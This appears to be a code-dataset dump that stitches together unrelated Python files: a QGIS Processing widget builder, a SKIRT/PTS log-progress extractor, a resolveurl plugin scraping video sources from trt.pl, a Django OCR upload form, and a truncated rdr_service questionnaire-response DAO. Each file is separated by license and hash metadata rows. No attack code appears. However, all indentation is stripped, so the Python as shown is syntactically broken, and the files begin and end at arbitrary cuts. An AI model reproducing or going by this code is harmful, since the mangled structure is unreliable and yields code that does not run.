layers = dataobjects.getVectorLayers(param.shapetype)
layers.sort(key=lambda lay: lay.name())
if param.optional:
item.addItem(self.NOT_SELECTED, None)
for layer in layers:
item.addItem(self.getExtendedLayerName(layer), layer)
item.currentIndexChanged.connect(self.updateDependentFields)
item.name = param.name
else:
layers = dataobjects.getVectorLayers(param.shapetype)
items = []
if param.optional:
items.append((self.NOT_SELECTED, None))
for layer in layers:
items.append((self.getExtendedLayerName(layer), layer))
# if already set, put first in list
for i,(name,layer) in enumerate(items):
if layer and layer.source() == param.value:
items.insert(0, items.pop(i))
item = InputLayerSelectorPanel(items, param)
elif isinstance(param, ParameterTable):
if self.somethingDependsOnThisParameter(param):
item = QComboBox()
layers = dataobjects.getTables()
if param.optional:
item.addItem(self.NOT_SELECTED, None)
for layer in layers:
item.addItem(layer.name(), layer)
item.currentIndexChanged.connect(self.updateDependentFields)
item.name = param.name
else:
layers = dataobjects.getTables()
items = []
if param.optional:
items.append((self.NOT_SELECTED, None))
for layer in layers:
items.append((layer.name(), layer))
# if already set, put first in list
for i,(name,layer) in enumerate(items):
if layer and layer.source() == param.value:
items.insert(0, items.pop(i))
item = InputLayerSelectorPanel(items, param)
elif isinstance(param, ParameterBoolean):
item = QCheckBox()
if param.default:
item.setChecked(True)
else:
item.setChecked(False)
elif isinstance(param, ParameterTableField):
item = QComboBox()
if param.parent in self.dependentItems:
items = self.dependentItems[param.parent]
else:
items = []
self.dependentItems[param.parent] = items
items.append(param.name)
parent = self.alg.getParameterFromName(param.parent)
if isinstance(parent, ParameterVector):
layers = dataobjects.getVectorLayers(parent.shapetype)
else:
layers = dataobjects.getTables()
if len(layers) > 0:
if param.optional:
item.addItem(self.tr('[not set]'))
item.addItems(self.getFields(layers[0], param.datatype))
elif isinstance(param, ParameterSelection):
item = QComboBox()
item.addItems(param.options)
item.setCurrentIndex(param.default)
elif isinstance(param, ParameterFixedTable):
item = FixedTablePanel(param)
elif isinstance(param, ParameterRange):
item = RangePanel(param)
elif isinstance(param, ParameterFile):
item = FileSelectionPanel(param.isFolder, param.ext)
elif isinstance(param, ParameterMultipleInput):
if param.datatype == ParameterMultipleInput.TYPE_FILE:
item = MultipleInputPanel(datatype=ParameterMultipleInput.TYPE_FILE)
else:
if param.datatype == ParameterMultipleInput.TYPE_RASTER:
options = dataobjects.getRasterLayers(sorting=False)
elif param.datatype == ParameterMultipleInput.TYPE_VECTOR_ANY:
options = dataobjects.getVectorLayers(sorting=False)
else:
options = dataobjects.getVectorLayers([param.datatype], sorting=False)
opts = []
for opt in options:
opts.append(self.getExtendedLayerName(opt))
item = MultipleInputPanel(opts)
elif isinstance(param, ParameterNumber):
item = NumberInputPanel(param.default, param.min, param.max,
param.isInteger)
elif isinstance(param, ParameterExtent):
item = ExtentSelectionPanel(self.parent, self.alg, param.default)
elif isinstance(param, ParameterCrs):
item = CrsSelectionPanel(param.default)
elif isinstance(param, ParameterString):
if param.multiline:
verticalLayout = QVBoxLayout()
verticalLayout.setSizeConstraint(
QLayout.SetDefaultConstraint)
textEdit = QPlainTextEdit()
textEdit.setPlainText(param.default)
verticalLayout.addWidget(textEdit)
item = textEdit
else:
item = QLineEdit()
item.setText(unicode(param.default))
elif isinstance(param, ParameterGeometryPredicate):
item = GeometryPredicateSelectionPanel(param.enabledPredicates)
if param.left:
widget = self.valueItems[param.left]
if isinstance(widget, InputLayerSelectorPanel):
widget = widget.cmbText
widget.currentIndexChanged.connect(item.onLeftLayerChange)
item.leftLayer = widget.itemData(widget.currentIndex())
if param.right:
widget = self.valueItems[param.right]
if isinstance(widget, InputLayerSelectorPanel):
widget = widget.cmbText
widget.currentIndexChanged.connect(item.onRightLayerChange)
item.rightLayer = widget.itemData(widget.currentIndex())
item.updatePredicates()
item.setValue(param.default)
else:
item = QLineEdit()
item.setText(unicode(param.default))
return item
def updateDependentFields(self):
sender = self.sender()
if not isinstance(sender, QComboBox):
return
if sender.name not in self.dependentItems:
return
layer = sender.itemData(sender.currentIndex())
children = self.dependentItems[sender.name]
for child in children:
widget = self.valueItems[child]
widget.clear()
if self.alg.getParameterFromName(child).optional:
widget.addItem(self.tr('[not set]'))
widget.addItems(self.getFields(layer,
self.alg.getParameterFromName(child).datatype))
def getFields(self, layer, datatype):
fieldTypes = []
if datatype == ParameterTableField.DATA_TYPE_STRING:
fieldTypes = [QVariant.String]
elif datatype == ParameterTableField.DATA_TYPE_NUMBER:
fieldTypes = [QVariant.Int, QVariant.Double, QVariant.ULongLong,
QVariant.UInt]
fieldNames = set()
for field in layer.pendingFields():
if not fieldTypes or field.type() in fieldTypes:
fieldNames.add(unicode(field.name()))
return sorted(list(fieldNames), cmp=locale.strcoll)
def somethingDependsOnThisParameter(self, parent):
for param in self.alg.parameters:
if isinstance(param, ParameterTableField):
if param.parent == parent.name:
return True
return False
|
gpl-2.0
| 8,098,731,851,604,483,000
| 42.492228
| 143
| 0.58792
| false
| 4.84922
| false
| false
| false
|
SKIRT/PTS
|
core/extract/progress.py
|
1
|
16047
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
## \package pts.core.extract.progress Contains the ProgressTable class and the the ProgressExtractor class.
# The latter class is used for extracting simulation progress from a simulation's log files into a ProgressTable object.
# -----------------------------------------------------------------
# Ensure Python 3 compatibility
from __future__ import absolute_import, division, print_function
# Import astronomical modules
from astropy.table import Table
# Import the relevant PTS classes and modules
from ..basics.log import log
# -----------------------------------------------------------------
class NoProgressData(Exception):
"""
This class ...
"""
def __init__(self, message, simulation_name=None):
"""
Thisf unction ...
:param message:
:param simulation_name:
"""
# Call the base class constructor with the parameters it needs
super(NoProgressData, self).__init__(message)
# The simulation name
self.simulation_name = simulation_name
# -----------------------------------------------------------------
class ProgressTable(Table):
"""
This function ...
"""
@classmethod
def from_columns(cls, process_list, phase_list, seconds_list, progress_list):
"""
This function ...
:param process_list:
:param phase_list:
:param seconds_list:
:param progress_list:
:return:
"""
names = ["Process rank", "Phase", "Time", "Progress"]
data = [process_list, phase_list, seconds_list, progress_list]
# Call the constructor of the base class
table = cls(data, names=names, masked=True)
# Set the column units
table["Time"].unit = "s"
table["Progress"].unit = "%"
table.path = None
return table
# -----------------------------------------------------------------
@classmethod
def from_file(cls, path):
"""
This function ...
:param path:
:return:
"""
# Open the table
#table = cls.read(path, format="ascii.ecsv")
table = super(ProgressTable, cls).read(path, format="ascii.ecsv")
# Set the path
table.path = path
# Return the table
return table
# -----------------------------------------------------------------
@classmethod
def from_remote_file(cls, path, remote):
"""
This function ...
:param path:
:param remote:
:return:
"""
# Open the contents
contents = remote.get_text(path)
# Open the table
table = cls.read(contents, format="ascii.ecsv")
# Return the table
return table
# -----------------------------------------------------------------
def save(self):
"""
This function ...
:return:
"""
# Save to the current path
self.saveto(self.path)
# -----------------------------------------------------------------
def saveto(self, path):
"""
This function ...
:param path:
:return:
"""
# Write the table in ECSV format
self.write(path, format="ascii.ecsv")
# Set the path
self.path = path
# -----------------------------------------------------------------
def extract_progress_cwd():
"""
Thisf unction ...
:return:
"""
from pts.core.simulation.simulation import createsimulations
# Create a SkirtSimulation object based on a log file present in the current working directory
simulation = createsimulations(single=True)
# Create a new ProgressExtractor instance
extractor = ProgressExtractor()
# Run the extractor and get the table
extractor.run(simulation)
table = extractor.table
# Return the progress table
return table
# -----------------------------------------------------------------
class ProgressExtractor(object):
"""
This class ...
"""
def __init__(self):
"""
The constructor ...
:return:
"""
# -- Attributes --
self.log_files = None
#self.staggered = None
self.table = None
# The output path
self.output_path = None
# -----------------------------------------------------------------
def run(self, simulation, output_path=None):
"""
This function ...
:return:
"""
# 1. Call the setup function
self.setup(simulation, output_path=output_path)
# 2. Perform the extraction
self.extract()
# 3. Write the results
if self.output_path is not None: self.write()
# -----------------------------------------------------------------
def setup(self, simulation, output_path=None):
"""
This function ...
:param simulation:
:param output_path:
:return:
"""
# Obtain the log files created by the simulation
self.log_files = simulation.logfiles()
# Determine whether the emission spectra calculation was performed using a staggered assignment scheme
# self.staggered = simulation.parameters().staggered()
# Set the output path
self.output_path = output_path
# -----------------------------------------------------------------
def extract(self):
"""
This function ...
:return:
"""
# Inform the user
log.info("Extracting ...")
number_of_processes = None
# Initialize lists for the columns
process_list = []
phase_list = []
seconds_list = []
progress_list = []
# Loop over the log files again and fill the column lists
for log_file in self.log_files:
# Get the total number of processes
if number_of_processes is None: number_of_processes = log_file.processes
else: assert number_of_processes == log_file.processes
# Get the process rank associated with this log file
process = log_file.process
stellar_start = None
spectra_start = None
dust_start = None
first_spectra_phase = True
last_dust_phase = False
total_entries = None
entries_per_process = None
# Loop over the entries in the log file
for i in range(len(log_file.contents)):
# Get the description of the current simulation phase
phase = log_file.contents["Phase"][i]
# The current log message
message = log_file.contents["Message"][i]
# The log file entries corresponding to the stellar emission phase
if phase == "stellar":
# If this is the log message that marks the very start of the stellar emission phase, record the associated time
if "photon packages for" in message:
stellar_start = log_file.contents["Time"][i]
# Add the process rank and phase entries
process_list.append(process)
phase_list.append(phase)
# Add the seconds entry
seconds_list.append(0.0)
# Get the progress and add it to the list
progress_list.append(0.0)
# If this is one of the log messages that log stellar emission progress
elif "Launched stellar emission photon packages" in message:
# Add the seconds entry
seconds = (log_file.contents["Time"][i] - stellar_start).total_seconds()
# Get the progress and add it to the list
try: progress = float(message.split("packages: ")[1].split("%")[0])
except: continue # INVALID LINE
# Add the process rank and phase entries
process_list.append(process)
phase_list.append(phase)
# Add the seconds and progress
seconds_list.append(seconds)
progress_list.append(progress)
# The log file entries corresponding to the stellar emission phase
elif phase == "spectra" and first_spectra_phase:
# If this is the log message that marks the very start of the spectra calculation, record the associated time
# If this log message states the total number of library entries that are used, record this number
if "Library entries in use" in message:
spectra_start = log_file.contents["Time"][i]
# Get the total number of library entries in use and the number of entries per process
total_entries = int(message.split("use: ")[1].split(" out of")[0])
entries_per_process = total_entries / number_of_processes
# Add the process rank and phase entries
process_list.append(process)
phase_list.append(phase)
# Add the seconds entry
seconds_list.append(0.0)
# Get the progress and add it to the list
progress_list.append(0.0)
elif "Calculating emission for" in message:
entry = float(message.split()[-1][:-3])
# Determine the progress
#if self.staggered: fraction = entry / total_entries
#else: fraction = (entry - process * entries_per_process) / entries_per_process
fraction = entry / total_entries
# Add the process rank and phase entries
process_list.append(process)
phase_list.append(phase)
# Add the seconds entry
seconds = (log_file.contents["Time"][i] - spectra_start).total_seconds()
seconds_list.append(seconds)
# Get the progress and add it to the list
progress = float(fraction*100.0)
progress_list.append(progress)
# The log file entries corresponding to the dust emission phase
# We only want to record the progress of the 'last' dust emission phase
elif phase == "dust" and last_dust_phase:
# If this is the log message that marks the very start of the dust emission phase, record the associated time
if "photon packages for" in message:
dust_start = log_file.contents["Time"][i]
# Add the process rank and phase entries
process_list.append(process)
phase_list.append(phase)
# Add the seconds entry
seconds_list.append(0.0)
# Get the progress and add it to the list
progress_list.append(0.0)
# If this is one of the log messages that log dust emission progress
elif "Launched dust emission photon packages" in message:
# Add the seconds entry
seconds = (log_file.contents["Time"][i] - dust_start).total_seconds()
# Get the progress and add it to the list
try: progress = float(message.split("packages: ")[1].split("%")[0])
except: continue # INVALID LINE
# Add the process rank and phase entries
process_list.append(process)
phase_list.append(phase)
# Add the seconds and progress
seconds_list.append(seconds)
progress_list.append(progress)
# Record the end of the spectra calculation (the first log message of the emission phase of the self-absorption cycle)
elif phase == "dust" and first_spectra_phase:
# If this line indicates the end of the dust emission spectra calculation
if "Dust emission spectra calculated" in message:
# Add the process rank and phase entries
process_list.append(process)
phase_list.append("spectra")
# Add the seconds entry
seconds = (log_file.contents["Time"][i] - spectra_start).total_seconds()
seconds_list.append(seconds)
# Add 100% progress to the list
progress_list.append(100.0)
# Indicate that the first spectra phase has already been processed (subsequent spectra phases can be ignored)
first_spectra_phase = False
# Log messages that fall in between phases
elif phase is None:
# The current log message
message = log_file.contents["Message"][i]
# Look for messages indicating whether this dust photon shooting phase corresponds to
# one of the dust self-absorption cycles or the actual dust emission phase
if "dust self-absorption cycle" in message: last_dust_phase = False
elif "Starting the dust emission phase" in message: last_dust_phase = True
elif "Finished the stellar emission phase" in message:
# Add the process rank and phase entries
process_list.append(process)
phase_list.append("stellar")
# Add the seconds entry
seconds = (log_file.contents["Time"][i] - stellar_start).total_seconds()
seconds_list.append(seconds)
# Add 100% progress to the list
progress_list.append(100.0)
elif "Finished the dust emission phase" in message:
# Add the process rank and phase entries
process_list.append(process)
phase_list.append("dust")
# Add the seconds entry
seconds = (log_file.contents["Time"][i] - dust_start).total_seconds()
seconds_list.append(seconds)
# Add 100% progress to the list
progress_list.append(100.0)
# Create the progress table
self.table = ProgressTable.from_columns(process_list, phase_list, seconds_list, progress_list)
# -----------------------------------------------------------------
def write(self):
"""
This function ...
:return:
"""
# Inform the user
log.info("Writing ...")
# Write the table to file
self.table.saveto(self.output_path)
# -----------------------------------------------------------------
def clear(self):
"""
This function ...
:return:
"""
# Set the table to None
self.table = None
# -----------------------------------------------------------------
|
agpl-3.0
| 3,470,374,518,671,627,000
| 31.881148
| 134
| 0.491836
| false
| 5.149551
| false
| false
| false
|
felipenaselva/felipe.repository
|
script.module.resolveurl/lib/resolveurl/plugins/trt.py
|
1
|
1776
|
'''
vidzi resolveurl plugin
Copyright (C) 2014 Eldorado
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
from lib import helpers
from resolveurl import common
from resolveurl.resolver import ResolveUrl, ResolverError
import re
class trtResolver(ResolveUrl):
name = "trt"
domains = ["trt.pl"]
pattern = '(?://|\.)(trt\.pl)/(?:film)/([0-9a-zA-Z]+)'
def __init__(self):
self.net = common.Net()
def get_media_url(self, host, media_id):
web_url = self.get_url(host, media_id)
headers = {'Referer': web_url, 'User-Agent': common.FF_USER_AGENT}
html = self.net.http_GET(web_url, headers=headers).content
pages = re.findall('href="([^"]+)[^>]+class="mainPlayerQualityHref"[^>]+>(.*?)</a>', html)
if pages:
try: pages.sort(key=lambda x: int(x[1][:-1]), reverse=True)
except: pass
html = self.net.http_GET('https://www.trt.pl' + pages[0][0], headers=headers).content
sources = helpers.scrape_sources(html, scheme='https')
return helpers.pick_source(sources) + helpers.append_headers(headers)
def get_url(self, host, media_id):
return 'https://www.trt.pl/film/%s' % media_id
|
gpl-2.0
| 3,321,776,893,372,562,000
| 37.608696
| 98
| 0.671734
| false
| 3.609756
| false
| false
| false
|
mikesname/python-ocrlab
|
ocrsite/ocrlab/forms/__init__.py
|
1
|
1274
|
"""Ocrlab forms."""
from django import forms
from django.template.defaultfilters import filesizeformat
from django.utils.translation import ugettext_lazy as _
from django.conf import settings
from ocrlab.models import Preset
# Add to your settings file
CONTENT_TYPES = ['image', 'video']
# 2.5MB - 2621440
# 5MB - 5242880
# 10MB - 10485760
# 20MB - 20971520
# 50MB - 5242880
# 100MB 104857600
# 250MB - 214958080
# 500MB - 429916160
MAX_UPLOAD_SIZE = "20971520"
class SimpleOcrForm(forms.Form):
file = forms.FileField()
async = forms.BooleanField(required=False)
preset = forms.ModelChoiceField(queryset=Preset.objects.all())
def clean_file(self):
content = self.cleaned_data['file']
content_type = content.content_type.split('/')[0]
if content_type in CONTENT_TYPES:
if content._size > MAX_UPLOAD_SIZE:
raise forms.ValidationError(_('Please keep filesize under %s. Current filesize %s') % (
filesizeformat(MAX_UPLOAD_SIZE),
filesizeformat(content._size)))
else:
raise forms.ValidationError(_('File type is not supported'))
return content
class PresetForm(forms.ModelForm):
class Meta:
model = Preset
|
mit
| -1,963,474,988,661,655,800
| 28.627907
| 103
| 0.658556
| false
| 3.758112
| false
| false
| false
|
all-of-us/raw-data-repository
|
rdr_service/dao/questionnaire_response_dao.py
|
1
|
57185
|
import json
import logging
import os
import re
from datetime import datetime
from dateutil import parser
from hashlib import md5
import pytz
from sqlalchemy import or_
from sqlalchemy.orm import joinedload, subqueryload
from typing import Dict
from werkzeug.exceptions import BadRequest
from rdr_service.lib_fhir.fhirclient_1_0_6.models import questionnaireresponse as fhir_questionnaireresponse
from rdr_service.participant_enums import QuestionnaireResponseStatus, PARTICIPANT_COHORT_2_START_TIME,\
PARTICIPANT_COHORT_3_START_TIME
from rdr_service.app_util import get_account_origin_id, is_self_request
from rdr_service import storage
from rdr_service import clock, config
from rdr_service.code_constants import (
CABOR_SIGNATURE_QUESTION_CODE,
CONSENT_COHORT_GROUP_CODE,
CONSENT_FOR_DVEHR_MODULE,
CONSENT_FOR_GENOMICS_ROR_MODULE,
CONSENT_FOR_ELECTRONIC_HEALTH_RECORDS_MODULE,
CONSENT_FOR_STUDY_ENROLLMENT_MODULE,
CONSENT_PERMISSION_YES_CODE,
DVEHRSHARING_CONSENT_CODE_NOT_SURE,
DVEHRSHARING_CONSENT_CODE_YES,
DVEHR_SHARING_QUESTION_CODE,
EHR_CONSENT_QUESTION_CODE,
EHR_CONSENT_EXPIRED_QUESTION_CODE,
GENDER_IDENTITY_QUESTION_CODE,
LANGUAGE_OF_CONSENT,
PMI_SKIP_CODE,
PPI_EXTRA_SYSTEM,
PPI_SYSTEM,
RACE_QUESTION_CODE,
CONSENT_GROR_YES_CODE,
CONSENT_GROR_NO_CODE,
CONSENT_GROR_NOT_SURE,
GROR_CONSENT_QUESTION_CODE,
CONSENT_COPE_YES_CODE,
CONSENT_COPE_NO_CODE,
CONSENT_COPE_DEFERRED_CODE,
COPE_CONSENT_QUESTION_CODE,
STREET_ADDRESS_QUESTION_CODE,
STREET_ADDRESS2_QUESTION_CODE,
EHR_CONSENT_EXPIRED_YES,
PRIMARY_CONSENT_UPDATE_QUESTION_CODE,
COHORT_1_REVIEW_CONSENT_YES_CODE,
COPE_VACCINE_MINUTE_1_MODULE_CODE)
from rdr_service.dao.base_dao import BaseDao
from rdr_service.dao.code_dao import CodeDao
from rdr_service.dao.participant_dao import ParticipantDao
from rdr_service.dao.participant_summary_dao import (
ParticipantGenderAnswersDao,
ParticipantRaceAnswersDao,
ParticipantSummaryDao,
)
from rdr_service.dao.questionnaire_dao import QuestionnaireHistoryDao, QuestionnaireQuestionDao
from rdr_service.field_mappings import FieldType, QUESTIONNAIRE_MODULE_CODE_TO_FIELD, QUESTION_CODE_TO_FIELD
from rdr_service.model.code import Code, CodeType
from rdr_service.model.questionnaire import QuestionnaireHistory, QuestionnaireQuestion
from rdr_service.model.questionnaire_response import QuestionnaireResponse, QuestionnaireResponseAnswer,\
QuestionnaireResponseExtension
from rdr_service.model.survey import Survey, SurveyQuestion, SurveyQuestionOption, SurveyQuestionType
from rdr_service.participant_enums import (
QuestionnaireDefinitionStatus,
QuestionnaireStatus,
TEST_LOGIN_PHONE_NUMBER_PREFIX,
get_gender_identity,
get_race,
ParticipantCohort,
ConsentExpireStatus)
_QUESTIONNAIRE_PREFIX = "Questionnaire/"
_QUESTIONNAIRE_HISTORY_SEGMENT = "/_history/"
_QUESTIONNAIRE_REFERENCE_FORMAT = _QUESTIONNAIRE_PREFIX + "{}" + _QUESTIONNAIRE_HISTORY_SEGMENT + "{}"
_SIGNED_CONSENT_EXTENSION = "http://terminology.pmi-ops.org/StructureDefinition/consent-form-signed-pdf"
_LANGUAGE_EXTENSION = "http://hl7.org/fhir/StructureDefinition/iso21090-ST-language"
_CATI_EXTENSION = "http://all-of-us.org/fhir/forms/non-participant-author"
def count_completed_baseline_ppi_modules(participant_summary):
baseline_ppi_module_fields = config.getSettingList(config.BASELINE_PPI_QUESTIONNAIRE_FIELDS, [])
return sum(
1
for field in baseline_ppi_module_fields
if getattr(participant_summary, field) == QuestionnaireStatus.SUBMITTED
)
def count_completed_ppi_modules(participant_summary):
ppi_module_fields = config.getSettingList(config.PPI_QUESTIONNAIRE_FIELDS, [])
return sum(
1 for field in ppi_module_fields if getattr(participant_summary, field, None) == QuestionnaireStatus.SUBMITTED
)
def get_first_completed_baseline_time(participant_summary):
baseline_authored = getattr(participant_summary, 'baselineQuestionnairesFirstCompleteAuthored')
if baseline_authored:
return baseline_authored
baseline_ppi_module_fields = config.getSettingList(config.BASELINE_PPI_QUESTIONNAIRE_FIELDS, [])
baseline_time = datetime(1000, 1, 1)
for field in baseline_ppi_module_fields:
field_value = getattr(participant_summary, field + "Authored")
if not field_value:
return None
else:
if field_value > baseline_time:
baseline_time = field_value
return baseline_time
class ResponseValidator:
def __init__(self, questionnaire_history: QuestionnaireHistory, session):
self.session = session
self._questionnaire_question_map = self._build_question_id_map(questionnaire_history)
self.survey = self._get_survey_for_questionnaire_history(questionnaire_history)
if self.survey is not None:
self._code_to_question_map = self._build_code_to_question_map()
if self.survey.redcapProjectId is not None:
logging.info('Validating imported survey')
# Get the skip code id
self.skip_code_id = self.session.query(Code.codeId).filter(Code.value == PMI_SKIP_CODE).scalar()
if self.skip_code_id is None:
logging.error('Unable to load PMI_SKIP code')
def _get_survey_for_questionnaire_history(self, questionnaire_history: QuestionnaireHistory):
survey_query = self.session.query(Survey).filter(
Survey.codeId.in_([concept.codeId for concept in questionnaire_history.concepts]),
Survey.importTime < questionnaire_history.created,
or_(
Survey.replacedTime.is_(None),
Survey.replacedTime > questionnaire_history.created
)
).options(
joinedload(Survey.questions).joinedload(SurveyQuestion.options).joinedload(SurveyQuestionOption.code)
)
num_surveys_found = survey_query.count()
if num_surveys_found == 0:
logging.warning(
f'No survey definition found for questionnaire id "{questionnaire_history.questionnaireId}" '
f'version "{questionnaire_history.version}"'
)
elif num_surveys_found > 1:
logging.warning(
f'Multiple survey definitions found for questionnaire id "{questionnaire_history.questionnaireId}" '
f'version "{questionnaire_history.version}"'
)
return survey_query.first()
def _build_code_to_question_map(self) -> Dict[int, SurveyQuestion]:
return {survey_question.code.codeId: survey_question for survey_question in self.survey.questions}
@classmethod
def _build_question_id_map(cls, questionnaire_history: QuestionnaireHistory) -> Dict[int, QuestionnaireQuestion]:
return {question.questionnaireQuestionId: question for question in questionnaire_history.questions}
@classmethod
def _validate_min_max(cls, answer, min_str, max_str, parser_function, question_code):
try:
if min_str:
min_parsed = parser_function(min_str)
if answer < min_parsed:
logging.warning(
f'Given answer "{answer}" is less than expected min "{min_str}" for question {question_code}'
)
if max_str:
max_parsed = parser_function(max_str)
if answer > max_parsed:
logging.warning(
f'Given answer "{answer}" is greater than expected max "{max_str}" for question {question_code}'
)
except (parser.ParserError, ValueError):
logging.error(f'Unable to parse validation string for question {question_code}', exc_info=True)
def _check_answer_has_expected_data_type(self, answer: QuestionnaireResponseAnswer,
question_definition: SurveyQuestion,
questionnaire_question: QuestionnaireQuestion):
question_code_value = questionnaire_question.code.value
if answer.valueCodeId == self.skip_code_id:
# Any questions can be answered with a skip, there's isn't anything to check in that case
return
if question_definition.questionType in (SurveyQuestionType.UNKNOWN,
SurveyQuestionType.DROPDOWN,
SurveyQuestionType.RADIO,
SurveyQuestionType.CHECKBOX):
number_of_selectable_options = len(question_definition.options)
if number_of_selectable_options == 0 and answer.valueCodeId is not None:
logging.warning(
f'Answer for {question_code_value} gives a value code id when no options are defined'
)
elif number_of_selectable_options > 0:
if answer.valueCodeId is None:
logging.warning(
f'Answer for {question_code_value} gives no value code id when the question has options defined'
)
elif answer.valueCodeId not in [option.codeId for option in question_definition.options]:
logging.warning(f'Code ID {answer.valueCodeId} is an invalid answer to {question_code_value}')
elif question_definition.questionType in (SurveyQuestionType.TEXT, SurveyQuestionType.NOTES):
if question_definition.validation is None and answer.valueString is None:
logging.warning(f'No valueString answer given for text-based question {question_code_value}')
elif question_definition.validation is not None and question_definition.validation != '':
if question_definition.validation.startswith('date'):
if answer.valueDate is None:
logging.warning(f'No valueDate answer given for date-based question {question_code_value}')
else:
self._validate_min_max(
answer.valueDate,
question_definition.validation_min,
question_definition.validation_max,
lambda validation_str: parser.parse(validation_str).date(),
question_code_value
)
elif question_definition.validation == 'integer':
if answer.valueInteger is None:
logging.warning(
f'No valueInteger answer given for integer-based question {question_code_value}'
)
else:
self._validate_min_max(
answer.valueInteger,
question_definition.validation_min,
question_definition.validation_max,
int,
question_code_value
)
else:
logging.warning(
f'Unrecognized validation string "{question_definition.validation}" '
f'for question {question_code_value}'
)
else:
# There aren't alot of surveys in redcap right now, so it's unclear how
# some of the other types would be answered
logging.warning(f'No validation check implemented for answer to {question_code_value} '
f'with question type {question_definition.questionType}')
def check_response(self, response: QuestionnaireResponse):
if self.survey is None:
return None
question_codes_answered = set()
for answer in response.answers:
questionnaire_question = self._questionnaire_question_map.get(answer.questionId)
if questionnaire_question is None:
# This is less validation, and more getting the object that should ideally already be linked
logging.error(f'Unable to find question {answer.questionId} in questionnaire history')
else:
survey_question = self._code_to_question_map.get(questionnaire_question.codeId)
if not survey_question:
logging.error(f'Question code used by the answer to question {answer.questionId} does not match a '
f'code found on the survey definition')
else:
self._check_answer_has_expected_data_type(answer, survey_question, questionnaire_question)
if survey_question.codeId in question_codes_answered:
logging.error(f'Too many answers given for {survey_question.code.value}')
elif survey_question.questionType != SurveyQuestionType.CHECKBOX:
if not (
survey_question.questionType == SurveyQuestionType.UNKNOWN and len(survey_question.options)
): # UNKNOWN question types could be for a Checkbox, so multiple answers should be allowed
question_codes_answered.add(survey_question.codeId)
class QuestionnaireResponseDao(BaseDao):
def __init__(self):
super(QuestionnaireResponseDao, self).__init__(QuestionnaireResponse)
def get_id(self, obj):
return obj.questionnaireResponseId
def get_with_session(self, session, obj_id, **kwargs):
result = super(QuestionnaireResponseDao, self).get_with_session(session, obj_id, **kwargs)
if result:
ParticipantDao().validate_participant_reference(session, result)
return result
def get_with_children(self, questionnaire_response_id):
with self.session() as session:
query = session.query(QuestionnaireResponse).options(subqueryload(QuestionnaireResponse.answers))
result = query.get(questionnaire_response_id)
if result:
ParticipantDao().validate_participant_reference(session, result)
return result
def _validate_model(self, session, obj): # pylint: disable=unused-argument
if not obj.questionnaireId:
raise BadRequest("QuestionnaireResponse.questionnaireId is required.")
if not obj.questionnaireVersion:
raise BadRequest("QuestionnaireResponse.questionnaireVersion is required.")
if not obj.answers:
logging.error("QuestionnaireResponse model has no answers. This is harmless but probably an error.")
def _validate_link_ids_from_resource_json_group(self, resource, link_ids):
"""
Look for question sections and validate the linkid in each answer. If there is a response
answer link id that does not exist in the questionnaire, then log a message. In
the future this may be changed to raising an exception.
This is a recursive function because answer groups can be nested.
:param resource: A group section of the response json.
:param link_ids: List of link ids to validate against.
"""
# note: resource can be either a dict or a list.
# if this is a dict and 'group' is found, always call ourselves.
if "group" in resource:
self._validate_link_ids_from_resource_json_group(resource["group"], link_ids)
if "question" not in resource and isinstance(resource, list):
for item in resource:
self._validate_link_ids_from_resource_json_group(item, link_ids)
# once we have a question section, iterate through list of answers.
if "question" in resource:
for section in resource["question"]:
link_id = section.get('linkId', None)
# Do not log warning or raise exception when link id is 'ignoreThis' for unit tests.
if (
link_id is not None
and link_id.lower() != "ignorethis"
and link_id not in link_ids
):
# The link_ids list being checked is a list of questions that have been answered,
# the list doesn't include valid link_ids that don't have answers
if "answer" in section:
logging.error(f'Questionnaire response contains invalid link ID "{link_id}"')
@staticmethod
def _imply_street_address_2_from_street_address_1(code_ids):
code_dao = CodeDao()
street_address_1_code = code_dao.get_code(PPI_SYSTEM, STREET_ADDRESS_QUESTION_CODE)
if street_address_1_code and street_address_1_code.codeId in code_ids:
street_address_2_code = code_dao.get_code(PPI_SYSTEM, STREET_ADDRESS2_QUESTION_CODE)
if street_address_2_code and street_address_2_code.codeId not in code_ids:
code_ids.append(street_address_2_code.codeId)
def insert_with_session(self, session, questionnaire_response):
# Look for a questionnaire that matches any of the questionnaire history records.
questionnaire_history = QuestionnaireHistoryDao().get_with_children_with_session(
session, [questionnaire_response.questionnaireId, questionnaire_response.questionnaireSemanticVersion]
)
if not questionnaire_history:
raise BadRequest(
f"Questionnaire with ID {questionnaire_response.questionnaireId}, \
semantic version {questionnaire_response.questionnaireSemanticVersion} is not found"
)
try:
answer_validator = ResponseValidator(questionnaire_history, session)
answer_validator.check_response(questionnaire_response)
except (AttributeError, ValueError, TypeError, LookupError):
logging.error('Code error encountered when validating the response', exc_info=True)
questionnaire_response.created = clock.CLOCK.now()
if not questionnaire_response.authored:
questionnaire_response.authored = questionnaire_response.created
# Put the ID into the resource.
resource_json = json.loads(questionnaire_response.resource)
resource_json["id"] = str(questionnaire_response.questionnaireResponseId)
questionnaire_response.resource = json.dumps(resource_json)
super().validate_origin(questionnaire_response)
# Gather the question ids and records that match the questions in the response
question_ids = [answer.questionId for answer in questionnaire_response.answers]
questions = QuestionnaireQuestionDao().get_all_with_session(session, question_ids)
# DA-623: raise error when response link ids do not match our question link ids.
# Gather the valid link ids for this question
link_ids = [question.linkId for question in questions]
# look through the response and verify each link id is valid for each question.
self._validate_link_ids_from_resource_json_group(resource_json, link_ids)
code_ids = [question.codeId for question in questions]
self._imply_street_address_2_from_street_address_1(code_ids)
current_answers = QuestionnaireResponseAnswerDao().get_current_answers_for_concepts(
session, questionnaire_response.participantId, code_ids
)
# IMPORTANT: update the participant summary first to grab an exclusive lock on the participant
# row. If you instead do this after the insert of the questionnaire response, MySQL will get a
# shared lock on the participant row due the foreign key, and potentially deadlock later trying
# to get the exclusive lock if another thread is updating the participant. See DA-269.
# (We need to lock both participant and participant summary because the summary row may not
# exist yet.)
if questionnaire_response.status == QuestionnaireResponseStatus.COMPLETED:
with self.session() as new_session:
self._update_participant_summary(
